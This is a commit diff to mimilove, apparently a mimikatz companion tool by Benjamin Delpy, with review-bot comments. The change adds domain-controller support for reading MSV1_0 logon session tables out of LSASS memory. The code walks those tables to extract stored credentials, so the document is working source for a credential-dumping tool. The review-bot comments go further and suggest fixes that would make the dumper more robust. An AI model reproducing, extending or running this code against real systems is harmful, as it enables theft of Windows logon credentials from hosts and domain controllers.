mimilove DC support (large table handle instead of small)

Benjamin DELPY 2015-07-19 15:15:31 +02:00
parent 9bac6378c6
commit f686a7400d
3 changed files with 118 additions and 93 deletions


@ -86,13 +86,14 @@ void mimilove_lsasrv(PKULL_M_MEMORY_HANDLE hMemory)
KULL_M_PROCESS_VERY_BASIC_MODULE_INFORMATION miLsasrv; KULL_M_PROCESS_VERY_BASIC_MODULE_INFORMATION miLsasrv;
KULL_M_MEMORY_HANDLE hLocalMemory = {KULL_M_MEMORY_TYPE_OWN, NULL}; KULL_M_MEMORY_HANDLE hLocalMemory = {KULL_M_MEMORY_TYPE_OWN, NULL};
KULL_M_MEMORY_ADDRESS aLsassMemory = {NULL, hMemory}, aLocalMemory = {NULL, &hLocalMemory}; KULL_M_MEMORY_ADDRESS aLsassMemory = {NULL, hMemory}, aLocalMemory = {NULL, &hLocalMemory};
PVOID base; PVOID baseTable, base;
KIWI_MSV1_0_LOGON_SESSION_TABLE_50 table; KIWI_MSV1_0_LOGON_SESSION_TABLE_50 table;
KIWI_MSV1_0_LIST_50 list; KIWI_MSV1_0_LIST_50 list;
KIWI_MSV1_0_ENTRY_50 entry; KIWI_MSV1_0_ENTRY_50 entry;
KIWI_MSV1_0_CREDENTIALS credentials; KIWI_MSV1_0_CREDENTIALS credentials;
KIWI_MSV1_0_PRIMARY_CREDENTIALS primaryCredentials; KIWI_MSV1_0_PRIMARY_CREDENTIALS primaryCredentials;
PMSV1_0_PRIMARY_CREDENTIAL_50 pPrimaryCred; PMSV1_0_PRIMARY_CREDENTIAL_50 pPrimaryCred;
DWORD tableCount = 0, i;
kprintf(L"========================================\n" kprintf(L"========================================\n"
L"LSASRV Credentials (MSV1_0, ...)\n" L"LSASRV Credentials (MSV1_0, ...)\n"
@ -109,6 +110,25 @@ void mimilove_lsasrv(PKULL_M_MEMORY_HANDLE hMemory)
{ {
if(aLsassMemory.address = base) // buffer if(aLsassMemory.address = base) // buffer
{ {
aLocalMemory.address = &table;
if(kull_m_memory_copy(&aLocalMemory, &aLsassMemory, sizeof(KIWI_MSV1_0_LOGON_SESSION_TABLE_50)))
{
if(table.tag == 'XTHL')
{
tableCount = 16;
baseTable = (PBYTE) aLsassMemory.address + sizeof(KIWI_MSV1_0_LOGON_SESSION_TABLE_50);
}
else if(table.tag == 'XTHS')
{
tableCount = 1;
baseTable = aLsassMemory.address;
}
else PRINT_ERROR(L"unknown table tag\n");
}
for(i = 0; i < tableCount ; i++)
{
aLsassMemory.address = (PBYTE) baseTable + i * sizeof(KIWI_MSV1_0_LOGON_SESSION_TABLE_50);
aLocalMemory.address = &table; aLocalMemory.address = &table;
if(kull_m_memory_copy(&aLocalMemory, &aLsassMemory, sizeof(KIWI_MSV1_0_LOGON_SESSION_TABLE_50))) if(kull_m_memory_copy(&aLocalMemory, &aLsassMemory, sizeof(KIWI_MSV1_0_LOGON_SESSION_TABLE_50)))
{ {
@ -230,6 +250,7 @@ void mimilove_lsasrv(PKULL_M_MEMORY_HANDLE hMemory)
} }
else PRINT_ERROR_AUTO(L"kull_m_memory_copy / KIWI_MSV1_0_LOGON_SESSION_TABLE_50"); else PRINT_ERROR_AUTO(L"kull_m_memory_copy / KIWI_MSV1_0_LOGON_SESSION_TABLE_50");
} }
}
else PRINT_ERROR(L"LogonSessionTable is NULL\n"); else PRINT_ERROR(L"LogonSessionTable is NULL\n");
} }
else PRINT_ERROR_AUTO(L"kull_m_memory_copy / ptr 1"); else PRINT_ERROR_AUTO(L"kull_m_memory_copy / ptr 1");
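Review bot: A failed read of the table header at the new `if(kull_m_memory_copy(&aLocalMemory, &aLsassMemory, sizeof(KIWI_MSV1_0_LOGON_SESSION_TABLE_50)))` in the second hunk is silent: there is no `else`, `tableCount` stays 0 and the loop is skipped, so the caller gets neither a table nor an error (mimilove_lsasrv starts before and ends after the hunks shown). The sibling copy below already reports with `PRINT_ERROR_AUTO(L"kull_m_memory_copy / KIWI_MSV1_0_LOGON_SESSION_TABLE_50")`, so the same style fits here: `else PRINT_ERROR_AUTO(L"kull_m_memory_copy / table header");`. `baseTable` is assigned only in the two recognised-tag branches and is never read while `tableCount` is 0, but `PVOID baseTable = NULL, base;` in the first hunk makes that invariant explicit and avoids an uninitialised-variable warning. The unknown-tag branch would be more useful for diagnosis if it printed the value, e.g. `else PRINT_ERROR(L"unknown table tag (0x%08x)\n", table.tag);`, provided PRINT_ERROR forwards format arguments. The multi-character constants 'XTHL' and 'XTHS' have implementation-defined values in standard C, so a comment such as `// 'XTHL': large header followed by 16 small tables, 'XTHS': a single small table` would record the layout the branch relies on.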


@ -72,12 +72,19 @@ typedef struct _KIWI_MSV1_0_LIST_50 {
PKIWI_MSV1_0_ENTRY_50 entry; PKIWI_MSV1_0_ENTRY_50 entry;
} KIWI_MSV1_0_LIST_50, *PKIWI_MSV1_0_LIST_50; } KIWI_MSV1_0_LIST_50, *PKIWI_MSV1_0_LIST_50;
typedef struct _KIWI_MSV1_0_LOGON_SESSION_TABLE_50 { typedef struct _KIWI_MSV1_0_LOGON_SESSION_TABLE_50 { // small
DWORD tag; DWORD tag;
DWORD unk0; DWORD unk0;
DWORD count; DWORD count;
DWORD unk1; DWORD unk1;
LIST_ENTRY list; // PKIWI_MSV1_0_LIST_50 LIST_ENTRY list; // PKIWI_MSV1_0_LIST_50
PVOID unkDelete;
DWORD unk2;
DWORD unk3;
DWORD unk4;
DWORD unk5;
DWORD unk6;
DWORD unk7;
} KIWI_MSV1_0_LOGON_SESSION_TABLE_50, *PKIWI_MSV1_0_LOGON_SESSION_TABLE_50; } KIWI_MSV1_0_LOGON_SESSION_TABLE_50, *PKIWI_MSV1_0_LOGON_SESSION_TABLE_50;
typedef struct _KIWI_KERBEROS_KEYS_LIST_5 { typedef struct _KIWI_KERBEROS_KEYS_LIST_5 {
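Review bot: The seven fields added to KIWI_MSV1_0_LOGON_SESSION_TABLE_50 (`PVOID unkDelete` through `DWORD unk7`) carry no comment, yet mimilove.c in this same commit uses `sizeof(KIWI_MSV1_0_LOGON_SESSION_TABLE_50)` both as the offset of the first small table after a large ('XTHL') header and as the stride between the 16 small tables, so every field here changes where lsasrv memory is read. A comment on the typedef stating that contract would protect the layout, e.g. `// small table; sizeof() is also assumed to be the large-header size and the stride between its 16 sub-tables (see mimilove_lsasrv)`. Because `unkDelete` is a `PVOID`, the struct size now depends on pointer width; if this path is only built for 32-bit targets that is harmless, otherwise it is worth stating which layout the offsets were derived from. The new `// small` on the typedef line names the table kind but not that the large header is read with the same size, which is what the new loop assumes.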


@ -46,9 +46,6 @@
<Filter Include="common modules"> <Filter Include="common modules">
<UniqueIdentifier>{7cb872e7-a52b-4394-a979-fd7a0a89d729}</UniqueIdentifier> <UniqueIdentifier>{7cb872e7-a52b-4394-a979-fd7a0a89d729}</UniqueIdentifier>
</Filter> </Filter>
<Filter Include="sekurlsa">
<UniqueIdentifier>{22523588-1016-45eb-b8d6-cc8f2763c695}</UniqueIdentifier>
</Filter>
</ItemGroup> </ItemGroup>
<ItemGroup> <ItemGroup>
<ResourceCompile Include="mimilove.rc" /> <ResourceCompile Include="mimilove.rc" />